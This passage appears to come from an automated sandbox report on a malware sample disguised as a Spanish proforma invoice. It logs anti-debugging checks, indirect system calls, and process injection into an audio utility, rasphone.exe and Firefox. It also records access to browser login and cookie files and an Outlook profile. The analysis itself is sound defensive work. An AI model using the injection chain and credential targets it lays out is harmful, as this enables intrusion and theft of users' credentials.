Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672753F mov eax, dword ptr fs:[00000030h] 2_2_3672753F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672753F mov eax, dword ptr fs:[00000030h] 2_2_3672753F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772539 mov eax, dword ptr fs:[00000030h] 2_2_36772539
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36761527 mov eax, dword ptr fs:[00000030h] 2_2_36761527
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676F523 mov eax, dword ptr fs:[00000030h] 2_2_3676F523
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674252B mov eax, dword ptr fs:[00000030h] 2_2_3674252B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674252B mov eax, dword ptr fs:[00000030h] 2_2_3674252B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674252B mov eax, dword ptr fs:[00000030h] 2_2_3674252B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674252B mov eax, dword ptr fs:[00000030h] 2_2_3674252B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674252B mov eax, dword ptr fs:[00000030h] 2_2_3674252B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674252B mov eax, dword ptr fs:[00000030h] 2_2_3674252B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674252B mov eax, dword ptr fs:[00000030h] 2_2_3674252B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36751514 mov eax, dword ptr fs:[00000030h] 2_2_36751514
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36751514 mov eax, dword ptr fs:[00000030h] 2_2_36751514
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36751514 mov eax, dword ptr fs:[00000030h] 2_2_36751514
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36751514 mov eax, dword ptr fs:[00000030h] 2_2_36751514
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36751514 mov eax, dword ptr fs:[00000030h] 2_2_36751514
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36751514 mov eax, dword ptr fs:[00000030h] 2_2_36751514
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367BC51D mov eax, dword ptr fs:[00000030h] 2_2_367BC51D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov ecx, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov ecx, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h] 2_2_367DF51B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672B502 mov eax, dword ptr fs:[00000030h] 2_2_3672B502
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h] 2_2_3675E507
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36732500 mov eax, dword ptr fs:[00000030h] 2_2_36732500
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676C50D mov eax, dword ptr fs:[00000030h] 2_2_3676C50D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676C50D mov eax, dword ptr fs:[00000030h] 2_2_3676C50D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367BC5FC mov eax, dword ptr fs:[00000030h] 2_2_367BC5FC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676A5E7 mov ebx, dword ptr fs:[00000030h] 2_2_3676A5E7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676A5E7 mov eax, dword ptr fs:[00000030h] 2_2_3676A5E7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h] 2_2_3673B5E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h] 2_2_3673B5E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h] 2_2_3673B5E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h] 2_2_3673B5E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h] 2_2_3673B5E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h] 2_2_3673B5E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367615EF mov eax, dword ptr fs:[00000030h] 2_2_367615EF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367B55E0 mov eax, dword ptr fs:[00000030h] 2_2_367B55E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367665D0 mov eax, dword ptr fs:[00000030h] 2_2_367665D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676C5C6 mov eax, dword ptr fs:[00000030h] 2_2_3676C5C6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h] 2_2_3672F5C7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h] 2_2_3672F5C7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h] 2_2_3672F5C7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h] 2_2_3672F5C7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h] 2_2_3672F5C7

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FF8BB0B9E7F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQuerySystemInformation: Direct from: 0x6E95AD
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtSuspendThread: Indirect: 0x36443B29
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E24FA
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtResumeThread: Indirect: 0x36443E49
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x6E9511
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtSetContextThread: Indirect: 0x36443809
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E253E
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FF8F0B42651
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E965C
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x491E716
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x6EAB94
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtCreateThreadEx: Direct from: 0x6E0AD8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x4916B5F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtAllocateVirtualMemory: Direct from: 0x6ED3D9
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x4916919
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtClose: Indirect: 0x3643F632
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x6E16D2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtQueueApcThread: Indirect: 0x3643F5A7
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x6E97A2
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQueryInformationToken: Direct from: 0x6E1E40
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E24CB
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E9704
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x4916AE8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: NULL target: C:\Windows\SysWOW64\rasphone.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Thread register set: target process: 6480
Source: C:\Windows\SysWOW64\rasphone.exe Thread register set: target process: 6480
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"
Source: C:\Windows\SysWOW64\rasphone.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerI/g
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040351C

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasphone.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY